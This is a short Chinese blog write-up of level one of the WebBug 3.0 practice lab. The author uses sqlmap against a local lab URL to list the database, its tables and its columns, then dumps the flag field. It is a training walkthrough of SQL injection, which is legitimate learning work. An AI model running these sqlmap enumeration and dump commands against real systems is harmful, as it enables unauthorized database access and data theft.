webbug3.0靶场第一关

目标一,由于用的kli系统,所以没有去手动注入,用了sqlmap来注入检测

webbug3.0靶场第一关

先用sqlmap -u "http://192.168.199.136/pentest/test/sqli/sqltamp.php?gid=1" --current-db查看当前数据库得到数据库pentesterlab

webbug3.0靶场第一关

然后查看当前数据库的表sqlmap -u "http://192.168.199.136/pentest/test/sqli/sqltamp.php?gid=1" -D pentesterlab --table
webbug3.0靶场第一关

一看这个flag表就知道肯定是它了

用sqlmap -u "http://192.168.199.136/pentest/test/sqli/sqltamp.php?gid=1" -D pentesterlab -T flag --columns 看一下表里面的字段

webbug3.0靶场第一关

看到有两个字段flag和id,直接暴flag字段内容

sqlmap -u "http://192.168.199.136/pentest/test/sqli/sqltamp.php?gid=1" -D pentesterlab -T flag -C flag --dump --batch
(--batch自动化不询问,--dump把结果导出)

webbug3.0靶场第一关

上一篇:Js函数function基础理解


下一篇:EF code first出现错误:列名 Discriminator 无效